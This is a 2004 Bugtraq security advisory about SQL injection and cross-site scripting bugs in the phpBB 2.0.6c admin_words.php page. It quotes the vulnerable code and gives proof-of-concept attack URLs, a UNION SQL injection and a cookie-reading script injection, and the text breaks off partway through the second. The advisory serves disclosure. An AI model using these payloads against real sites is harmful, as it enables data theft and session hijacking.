From come2waraxe@yahoo.com Tue Mar 23 13:53:22 2004 From: Janek Vind To: bugtraq@securityfocus.com Date: 22 Mar 2004 16:58:11 -0000 Subject: [waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c] {================================================================================} { [waraxe-2004-SA#009] } {================================================================================} { } { [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 16. March 2004 Location: Estonia, Tartu Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PhpBB is widely used and very popular forum software, written in php. Homepage: http://www.phpbb.com/ Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Original code from admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45, starting from line 74: ------------------------------- if( $mode == "edit" ) { if( $word_id ) { $sql = "SELECT * FROM " . WORDS_TABLE . " WHERE word_id = $word_id"; if(!$result = $db->sql_query($sql)) { message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql); } $word_info = $db->sql_fetchrow($result); $s_hidden_fields .= ''; } else { message_die(GENERAL_MESSAGE, $lang['No_word_selected']); } } -------------------------------- As we can see, parameter $word_id is submitted to sql query WITHOUT single quotes, therefore it's possible sql injection, for example with UNION method: http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/* and we get error feedback: ------------------------------------------------ Error Could not query words table DEBUG MODE SQL Error : 1222 The used SELECT statements have a different number of columns SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/* Line : 83 File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php ------------------------------------------------ By implementing so-called "blind" sql injection methods, we can pull out from sql database any information. So why i'm categorizing this bug as "non-critical"? Because we need first log in as forum administrator to make successful attack. So it's not so "useful" security bug ;) But let's think again - what, if we make such request: http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(document.cookie);